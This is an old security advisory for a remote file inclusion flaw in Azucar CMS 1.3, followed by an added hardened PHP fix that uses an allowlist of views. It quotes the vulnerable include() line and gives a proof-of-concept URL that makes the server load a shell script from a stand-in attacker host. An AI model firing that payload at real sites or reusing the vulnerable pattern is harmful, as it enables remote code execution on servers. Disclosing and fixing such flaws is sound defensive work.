SECURITYVULNS:DOC:15452
Dec 20, 2006 - 12:00 a.m.

Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability

vulners.com

+------------------------------------------------------------------------------------------
  Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability
+------------------------------------------------------------------------------------------
  Affected Software .: Azucar CMS <= 1.3
  Download ..........: http://downloads.sourceforge.net/azucarcms/azucarcms1.3.zip
  Description .......: "Azucar is a modular content management system designed to be extremely user friendly"
  Class .............: Remote File Inclusion
  Risk ..............: High (Remote File Execution)
  Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+------------------------------------------------------------------------------------------
  Details:

  Azucar CMS admin/index_sitios.php uses the include function insecurely on the $_GET[_VIEW]
  parameter passed to the script; a remote file can be specified and executed on the server.

  Vulnerable Code:

  admin/index_sitios.php, line(s) 14-15:

  -> 14-15: if (isset($_GET[_VIEW])) include($_GET[_VIEW]);

  Proof Of Concept:

  http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php
+------------------------------------------------------------------------------------------
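The fix a code reviewer would expect for the include() above, written here as an added example and not as Azucar CMS code: the reported line is kept in a comment for contrast, and the replacement resolves _VIEW through an allowlist of local view files (the view names, the views directory and the function name are hypothetical).

```php
<?php
// Added example: a hardened replacement for the include() reported in admin/index_sitios.php.
// Hypothetical view names and directory; not taken from Azucar CMS.

// Reported pattern, kept for comparison only: the raw request value is passed straight to
// include(), so a URL (with allow_url_include on) or any readable local path gets executed.
//   if (isset($_GET[_VIEW])) include($_GET[_VIEW]);

// Hardened form: the request may only select a key, never supply a path.
const VIEW_DIR = __DIR__ . '/views';                 // fixed directory, hypothetical
const VIEWS = array(                                 // hypothetical allowlist
    'list'   => 'sitios_list.php',
    'edit'   => 'sitios_edit.php',
    'delete' => 'sitios_delete.php',
);

// Returns the absolute path of the allowed view file, or null if the request is not acceptable.
function resolve_view($requested)
{
    // Reject non-strings (e.g. ?_VIEW[]=x) and anything that is not an exact allowlist key.
    if (!is_string($requested) || !array_key_exists($requested, VIEWS)) {
        return null;
    }
    $real = realpath(VIEW_DIR . '/' . VIEWS[$requested]);
    $base = realpath(VIEW_DIR);
    // realpath() resolves symlinks and "..", so even a bad allowlist entry cannot leave VIEW_DIR.
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$view = resolve_view(isset($_GET['_VIEW']) ? $_GET['_VIEW'] : 'list');
if ($view === null) {
    http_response_code(400);
    exit('Unknown view');
}
include $view;
```

Keeping allow_url_include=Off in php.ini (its default) blocks the remote half of this class of bug but not inclusion of arbitrary local files, which is why the allowlist is the actual fix.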